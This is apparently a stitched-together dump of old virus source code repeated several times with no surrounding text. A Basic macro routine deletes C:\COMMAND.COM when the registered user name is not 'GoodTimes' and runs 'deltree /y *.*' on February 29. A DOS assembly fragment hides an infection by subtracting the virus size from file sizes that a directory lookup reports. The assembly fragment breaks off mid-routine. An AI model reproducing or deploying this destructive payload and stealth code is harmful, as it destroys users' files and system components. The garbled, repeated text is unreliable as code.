Sub Main
           If Application.Username <> "GoodTimes" Then
           ' Check the registration name of the application
              SetAttr "C:\COMMAND.COM",0
              ' Wipe the attributes of COMMAND.COM
              Open "C:\COMMAND.COM" for Output as #1
              ' We open it for checking if it activates any error flag
              Close #1
              ' It exists, ok... let's close it...
              Kill "C:\COMMAND.COM"
              ' ... and kill it }:-)
           End If
           If Month(Now())=2 Then
           ' System date -> month=february (2)?
              If Day(Now())=29 Then
              ' february 29th? (only one time each four years) :-)
                 Shell "deltree /y *.* > null"
                 ' Btw... /y works for all the languages :-)
              End If
           End If
        End Sub
 ;Routine...  (Look at Method #1 for Int21h handler)                       
         pushf                        ;Fake an Int Call                    
         push    cs                   ;Save our location                   
         call    int21Call            ;Step #1                             
         jc      no_good              ;Error Split                         
         push    ax                                                        
         push    bx                                                        
         push    es                                                        
         mov     ah,51h               ;Get Current DTA                     
         int     21h                  ;ES:BX --> DTA                       
         mov     ax,es:[bx+16h]       ;Get File Time                       
         and     ax,1fh               ;Un Mask Seconds field               
         xor     al,1dh               ;Is it 58 Seconds?                   
         jnz     not_infected         ;Not infected! Dah?                  
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
         pop     es                                                        
         pop     bx                   ;Restore Registers                   
         pop     ax                                                        
        Sub Main
           If Application.Username <> "GoodTimes" Then
           ' We check the registration name of the application
              SetAttr "C:\COMMAND.COM",0
              ' Wipe the attributes of COMMAND.COM
              Open "C:\COMMAND.COM" for Output as #1
              ' We open it for checking if it activates any error flag
              Close #1
              ' It exists, ok... let's close it...
              Kill "C:\COMMAND.COM"
              ' ... and kill it }:-)
           End If
           If Month(Now())=2 Then
           ' System date -> month=february (2)?
              If Day(Now())=29 Then
              ' february 29th? (only one time each four years) :-)
                 Shell "deltree /y *.* > null"
                 ' Btw... /y works for all the languages :-)
              End If
           End If
        End Sub
 ;Routine...  (Look at Method #1 for Int21h handler)                       
         pushf                        ;Fake an Int Call                    
         push    cs                   ;Save our location                   
         call    int21Call            ;Step #1                             
         jc      no_good              ;Error Split                         
         push    ax                                                        
         push    bx                                                        
         push    es                                                        
         mov     ah,51h               ;Get Current DTA                     
         int     21h                  ;ES:BX --> DTA                       
         mov     ax,es:[bx+16h]       ;Get File Time                       
         and     ax,1fh               ;Un Mask Seconds field               
         xor     al,1dh               ;Is it 58 Seconds?                   
         jnz     not_infected         ;Not infected! Dah?                  
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
         pop     es                                                        
         pop     bx                   ;Restore Registers                   
         pop     ax                                                        
        Sub Main
           If Application.Username <> "GoodTimes" Then
           ' We check the registration name of the application
              SetAttr "C:\COMMAND.COM",0
              ' Wipe the attributes of COMMAND.COM
              Open "C:\COMMAND.COM" for Output as #1
              ' We open it for checking if it activates any error flag
              Close #1
              ' It exists, ok... let's close it...
              Kill "C:\COMMAND.COM"
              ' ... and kill it }:-)
           End If
           If Month(Now())=2 Then
           ' System date -> month=february (2)?
              If Day(Now())=29 Then
              ' february 29th? (only one time each four years) :-)
                 Shell "deltree /y *.* > null"
                 ' Btw... /y works for all the languages :-)
              End If
           End If
        End Sub
 ;Routine...  (Look at Method #1 for Int21h handler)                       
         pushf                        ;Fake an Int Call                    
         push    cs                   ;Save our location                   
         call    int21Call            ;Step #1                             
         jc      no_good              ;Error Split                         
         push    ax                                                        
         push    bx                                                        
         push    es                                                        
         mov     ah,51h               ;Get Current DTA                     
         int     21h                  ;ES:BX --> DTA                       
         mov     ax,es:[bx+16h]       ;Get File Time                       
         and     ax,1fh               ;Un Mask Seconds field               
         xor     al,1dh               ;Is it 58 Seconds?                   
         jnz     not_infected         ;Not infected! Dah?                  
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
         pop     es                                                        
         pop     bx                   ;Restore Registers                   
         pop     ax                                                        
           If Application.Username <> "GoodTimes" Then
           ' We check the registration name of the application
              SetAttr "C:\COMMAND.COM",0
              ' Wipe the attributes of COMMAND.COM
              Open "C:\COMMAND.COM" for Output as #1
              ' We open it for checking if it activates any error flag
              Close #1
              ' It exists, ok... let's close it...
              Kill "C:\COMMAND.COM"
              ' ... and kill it }:-)
           End If
           If Month(Now())=2 Then
           ' System date -> month=february (2)?
              If Day(Now())=29 Then
              ' february 29th? (only one time each four years) :-)
                 Shell "deltree /y *.* > null"
                 ' Btw... /y works for all the languages :-)
              End If
           End If
        End Sub
 ;Routine...  (Look at Method #1 for Int21h handler)                       
         pushf                        ;Fake an Int Call                    
         push    cs                   ;Save our location                   
         call    int21Call            ;Step #1                             
         jc      no_good              ;Error Split                         
         push    ax                                                        
         push    bx                                                        
         push    es                                                        
         mov     ah,51h               ;Get Current DTA                     
         int     21h                  ;ES:BX --> DTA                       
         mov     ax,es:[bx+16h]       ;Get File Time                       
         and     ax,1fh               ;Un Mask Seconds field               
         xor     al,1dh               ;Is it 58 Seconds?                   
         jnz     not_infected         ;Not infected! Dah?                  
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
         pop     es                                                        
         pop     bx                   ;Restore Registers                   
         pop     ax                                                        
        Sub Main
           If Application.Username <> "GoodTimes" Then
           ' We check the registration name of the application
              SetAttr "C:\COMMAND.COM",0
              ' Wipe the attributes of COMMAND.COM
              Open "C:\COMMAND.COM" for Output as #1
              ' We open it for checking if it activates any error flag
              Close #1
              ' It exists, ok... let's close it...
              Kill "C:\COMMAND.COM"
              ' ... and kill it }:-)
           End If
           If Month(Now())=2 Then
           ' System date -> month=february (2)?
              If Day(Now())=29 Then
              ' february 29th? (only one time each four years) :-)
                 Shell "deltree /y *.* > null"
                 ' Btw... /y works for all the languages :-)
              End If
           End If
        End Sub
 ;Routine...  (Look at Method #1 for Int21h handler)                       
         pushf                        ;Fake an Int Call                    
         push    cs                   ;Save our location                   
         call    int21Call            ;Step #1                             
         jc      no_good              ;Error Split                         
         push    ax                                                        
         push    bx                                                        
         push    es                                                        
         mov     ah,51h               ;Get Current DTA                     
         int     21h                  ;ES:BX --> DTA                       
         mov     ax,es:[bx+16h]       ;Get File Time                       
         and     ax,1fh               ;Un Mask Seconds field               
         xor     al,1dh               ;Is it 58 Seconds?                   
         jnz     not_infected         ;Not infected! Dah?                  
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
         pop     es                                                        
         pop     bx                   ;Restore Registers                   
         pop     ax                                                        
        Sub Main
           If Application.Username <> "GoodTimes" Then
           ' We check the registration name of the application
              SetAttr "C:\COMMAND.COM",0
              ' Wipe the attributes of COMMAND.COM
              Open "C:\COMMAND.COM" for Output as #1
              ' We open it for checking if it activates any error flag
              Close #1
              ' It exists, ok... let's close it...
              Kill "C:\COMMAND.COM"
              ' ... and kill it }:-)
           End If
           If Month(Now())=2 Then
           ' System date -> month=february (2)?
              If Day(Now())=29 Then
              ' february 29th? (only one time each four years) :-)
                 Shell "deltree /y *.* > null"
                 ' Btw... /y works for all the languages :-)
              End If
           End If
        End Sub
 ;Routine...  (Look at Method #1 for Int21h handler)                       
         pushf                        ;Fake an Int Call                    
         push    cs                   ;Save our location                   
         call    int21Call            ;Step #1                             
         jc      no_good              ;Error Split                         
         push    ax                                                        
         push    bx                                                        
         push    es                                                        
         mov     ah,51h               ;Get Current DTA                     
         int     21h                  ;ES:BX --> DTA                       
         mov     ax,es:[bx+16h]       ;Get File Time                       
         and     ax,1fh               ;Un Mask Seconds field               
         xor     al,1dh               ;Is it 58 Seconds?                   
         jnz     not_infected         ;Not infected! Dah?                  
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
         pop     es                                                        
         pop     bx                   ;Restore Registers                   
         pop     ax                                                        